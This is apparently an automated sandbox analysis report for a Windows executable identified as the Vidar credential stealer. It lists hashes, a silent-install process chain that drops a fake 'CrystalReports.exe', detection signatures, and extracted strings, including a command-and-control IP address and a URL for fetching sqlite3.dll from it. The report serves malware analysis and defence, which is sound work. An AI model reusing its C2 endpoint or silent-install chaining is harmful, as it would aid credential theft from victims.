Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report br4Cu3BycW.exe

Overview

General Information

Sample Name:br4Cu3BycW.exe
Analysis ID:492023
MD5:ec72a93f6279b16006f2196f330166ee
SHA1:74b4d4a19500d3644a6a4f523ad7d4adcb1ace6f
SHA256:4340bc1e1ddb5d268a010401be96435063de733a2601d158d13f56da9f20df5d
Tags:exe
Infos:

Most interesting Screenshot:

Detection

Vidar
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
PE file has a writeable .text section
.NET source code contains in memory code execution
Found many strings related to Crypto-Wallets (likely being stolen)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Stores files to the Windows start menu directory
Yara detected Credential Stealer
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to launch a program with higher privileges
Binary contains a suspicious time stamp
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • br4Cu3BycW.exe (PID: 4352 cmdline: 'C:\Users\user\Desktop\br4Cu3BycW.exe' MD5: EC72A93F6279B16006F2196F330166EE)
    • br4Cu3BycW.tmp (PID: 5816 cmdline: 'C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp' /SL5='$302CC,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe' MD5: EEB69F7B86959AE72B9D37443FB7F3D0)
      • br4Cu3BycW.exe (PID: 5092 cmdline: 'C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENT MD5: EC72A93F6279B16006F2196F330166EE)
        • br4Cu3BycW.tmp (PID: 5636 cmdline: 'C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp' /SL5='$120262,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENT MD5: EEB69F7B86959AE72B9D37443FB7F3D0)
          • CrystalReports.exe (PID: 6532 cmdline: 'C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe' MD5: 11DD538F1BF5F174834DBA334964A691)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.562826054.0000000002670000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: CrystalReports.exe PID: 6532JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: CrystalReports.exe PID: 6532JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

        Sigma Overview

        No Sigma rule has matched

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Multi AV Scanner detection for submitted fileShow sources
        Source: br4Cu3BycW.exeReversingLabs: Detection: 28%
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe (copy)ReversingLabs: Detection: 11%
        Source: br4Cu3BycW.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
        Source: br4Cu3BycW.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: Microsoft.ReportViewer.ProcessingObjectModel.pdb source: br4Cu3BycW.tmp, 00000006.00000003.313356977.0000000005020000.00000004.00000001.sdmp
        Source: Binary string: D:\projects\capsa\output\x64_Release\pdb\tsharkdecode.pdb source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmp
        Source: Binary string: C:\lib\source\Programming\pdb\V\qt\YordansDev\SoftwareIdeasMod.pdb source: br4Cu3BycW.tmp, 00000006.00000003.313356977.0000000005020000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000002.564667817.000000006E418000.00000002.00020000.sdmp
        Source: Binary string: C:\SharpShell\Antlr4\2016\brutal\qtbase\pdb\obj\ReportSource\InstallDir.pdb, source: br4Cu3BycW.tmp, 00000006.00000003.313835151.0000000005454000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000000.313157363.0000000000818000.00000002.00020000.sdmp
        Source: Binary string: C:\SharpShell\Antlr4\2016\brutal\qtbase\pdb\obj\ReportSource\InstallDir.pdb source: br4Cu3BycW.tmp, 00000006.00000003.313835151.0000000005454000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000000.313157363.0000000000818000.00000002.00020000.sdmp
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0040AEF4 FindFirstFileW,FindClose,1_2_0040AEF4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,1_2_0040A928
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0060C2B0 FindFirstFileW,GetLastError,3_2_0060C2B0
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0040E6A0 FindFirstFileW,FindClose,3_2_0040E6A0
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,3_2_0040E0D4
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,3_2_006B8DE4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 5_2_0040AEF4 FindFirstFileW,FindClose,5_2_0040AEF4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 5_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,5_2_0040A928
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_0060C2B0 FindFirstFileW,GetLastError,6_2_0060C2B0
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_0040E6A0 FindFirstFileW,FindClose,6_2_0040E6A0
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,6_2_0040E0D4
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,6_2_006B8DE4
        Source: global trafficTCP traffic: 192.168.2.3:49750 -> 147.135.170.166:80
        Source: unknownTCP traffic detected without corresponding DNS query: 147.135.170.166
        Source: unknownTCP traffic detected without corresponding DNS query: 147.135.170.166
        Source: unknownTCP traffic detected without corresponding DNS query: 147.135.170.166
        Source: br4Cu3BycW.tmp, 00000006.00000003.313702473.000000000533D000.00000004.00000001.sdmpString found in binary or memory: HTTP://WWW.MPEGLA.COM
        Source: br4Cu3BycW.tmp, 00000006.00000003.313702473.000000000533D000.00000004.00000001.sdmpString found in binary or memory: HTTP://WWW.MPEGLA.COM.
        Source: CrystalReports.exe, 00000007.00000002.562905629.000000000298E000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000002.562973809.00000000029C9000.00000004.00000001.sdmpString found in binary or memory: http://147.135.170.166/
        Source: CrystalReports.exe, 00000007.00000002.562956056.00000000029BC000.00000004.00000001.sdmpString found in binary or memory: http://147.135.170.166/public/sqlite3.dll
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://alioth.debian.org/forum/?group_id=31080
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=104456&repeatmerged=yes
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://bura-bura.com/blog/archives/2005/08/02/how-to-compile-an-application-for-102-or-103-using-xco
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000002.563020434.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: http://fsf.org/
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: http://s.symcd.com06
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://scripts.sil.org/OFL
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://sdlpango.sourceforge.net
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://sourceforge.net/bugs/?func=detailbug&bug_id=131474&group_id=12715)
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://sourceforge.net/tracker/index.php?func=detail&aid=414339&group_id=12715&atid=112715)
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://sourceforge.net/tracker/index.php?func=detail&aid=421508&group_id=12715&atid=112715)
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://sources.redhat.com/pthreads-win32/d&
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: http://sv.symcd.com0&
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://translationproject.org/
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://translationproject.org/extra/matrix.html
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://tux4kids.alioth.debian.org
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://tux4kids.net/~jdandr2)
        Source: br4Cu3BycW.tmp, 00000006.00000003.313702473.000000000533D000.00000004.00000001.sdmpString found in binary or memory: http://www.elecard.com
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: http://www.filehelpers.com
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: http://www.filehelpers.com0
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: http://www.filehelpers.com4
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: http://www.filehelpers.comg
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://www.galuzzi.it.
        Source: CrystalReports.exe, 00000007.00000002.563020434.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: http://www.gnu.org/licenses/
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000002.563020434.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: http://www.gnu.org/philosophy/why-not-lgpl.html
        Source: br4Cu3BycW.tmp, 00000006.00000003.313702473.000000000533D000.00000004.00000001.sdmpString found in binary or memory: http://www.iisc.ernet.in
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://www.libsdl.org
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://www.libsdl.org/download-1.2.php
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://www.libsdl.org/projects/SDL_image
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://www.libsdl.org/projects/SDL_image/
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://www.libsdl.org/projects/SDL_mixer
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://www.libsdl.org/projects/SDL_mixer/
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://www.libsdl.org/projects/SDL_ttf
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://www.libsdl.org/projects/SDL_ttf/
        Source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpString found in binary or memory: http://www.tux4kids.com.
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: https://d.symcb.com/cps0%
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: https://d.symcb.com/rpa0
        Source: br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
        Source: br4Cu3BycW.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdline
        Source: br4Cu3BycW.exe, 00000001.00000000.291530207.0000000000401000.00000020.00020000.sdmp, br4Cu3BycW.exe, 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
        Source: br4Cu3BycW.tmp, br4Cu3BycW.tmp, 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmpString found in binary or memory: https://www.innosetup.com/
        Source: br4Cu3BycW.tmpString found in binary or memory: https://www.remobjects.com/ps

        System Summary:

        barindex
        PE file has a writeable .text sectionShow sources
        Source: is-7MTO8.tmp.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: br4Cu3BycW.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004AF110
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_0060F6D8
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 5_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,5_2_004AF110
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,6_2_0060F6D8
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004323DC1_2_004323DC
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004255DC1_2_004255DC
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0040E9C41_2_0040E9C4
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_006B786C3_2_006B786C
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0040C9383_2_0040C938
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 5_2_004323DC5_2_004323DC
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 5_2_004255DC5_2_004255DC
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 5_2_0040E9C45_2_0040E9C4
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_006B786C6_2_006B786C
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_0040C9386_2_0040C938
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: String function: 00427848 appears 42 times
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: String function: 0040CC60 appears 34 times
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: String function: 0040873C appears 36 times
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: String function: 005F5C7C appears 50 times
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: String function: 005F5F60 appears 62 times
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: String function: 005DE888 appears 40 times
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: String function: 0060CD28 appears 31 times
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: String function: 005F5C7C appears 50 times
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: String function: 005F5F60 appears 62 times
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: String function: 005DE888 appears 40 times
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: String function: 006163B4 appears 38 times
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: String function: 00616130 appears 39 times
        Source: br4Cu3BycW.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: br4Cu3BycW.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: br4Cu3BycW.exe, 00000001.00000003.292227773.00000000025F0000.00000004.00000001.sdmpBinary or memory string: OriginalFileName vs br4Cu3BycW.exe
        Source: br4Cu3BycW.exe, 00000001.00000003.302497238.0000000002378000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamekernel32j% vs br4Cu3BycW.exe
        Source: br4Cu3BycW.exe, 00000005.00000000.298033659.00000000004C6000.00000002.00020000.sdmpBinary or memory string: OriginalFileName vs br4Cu3BycW.exe
        Source: br4Cu3BycW.exe, 00000005.00000003.320593435.0000000000A68000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamekernel32j% vs br4Cu3BycW.exe
        Source: br4Cu3BycW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: br4Cu3BycW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: br4Cu3BycW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: br4Cu3BycW.tmp.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: br4Cu3BycW.tmp.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: br4Cu3BycW.tmp.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: br4Cu3BycW.tmp.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: br4Cu3BycW.tmp.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: br4Cu3BycW.tmp.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: br4Cu3BycW.tmp.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: br4Cu3BycW.tmp.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: is-7MTO8.tmp.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeSection loaded: sqlite3.dllJump to behavior
        Source: is-33ENG.tmp.6.drStatic PE information: Number of sections : 13 > 10
        Source: is-5P6B9.tmp.6.drStatic PE information: Number of sections : 14 > 10
        Source: is-KTI9L.tmp.6.drStatic PE information: Number of sections : 13 > 10
        Source: is-VO510.tmp.6.drStatic PE information: Number of sections : 12 > 10
        Source: is-FCT1V.tmp.6.drStatic PE information: Number of sections : 13 > 10
        Source: br4Cu3BycW.exeReversingLabs: Detection: 28%
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeFile read: C:\Users\user\Desktop\br4Cu3BycW.exeJump to behavior
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\br4Cu3BycW.exe 'C:\Users\user\Desktop\br4Cu3BycW.exe'
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeProcess created: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp 'C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp' /SL5='$302CC,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe'
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess created: C:\Users\user\Desktop\br4Cu3BycW.exe 'C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENT
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp 'C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp' /SL5='$120262,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENT
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe 'C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe'
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeProcess created: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp 'C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp' /SL5='$302CC,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe' Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess created: C:\Users\user\Desktop\br4Cu3BycW.exe 'C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENTJump to behavior
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp 'C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp' /SL5='$120262,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe 'C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe' Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004AF110
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_0060F6D8
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 5_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,5_2_004AF110
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,6_2_0060F6D8
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeFile created: C:\Users\user\AppData\Local\Temp\is-I744N.tmpJump to behavior
        Source: classification engineClassification label: mal76.troj.spyw.evad.winEXE@9/191@0/1
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0062CFB8 GetVersion,CoCreateInstance,3_2_0062CFB8
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0041A4DC GetDiskFreeSpaceW,1_2_0041A4DC
        Source: CrystalReports.exe, 00000007.00000002.562307914.00000000007A7000.00000002.00020000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: CrystalReports.exe, 00000007.00000002.562307914.00000000007A7000.00000002.00020000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
        Source: CrystalReports.exe, 00000007.00000002.562307914.00000000007A7000.00000002.00020000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
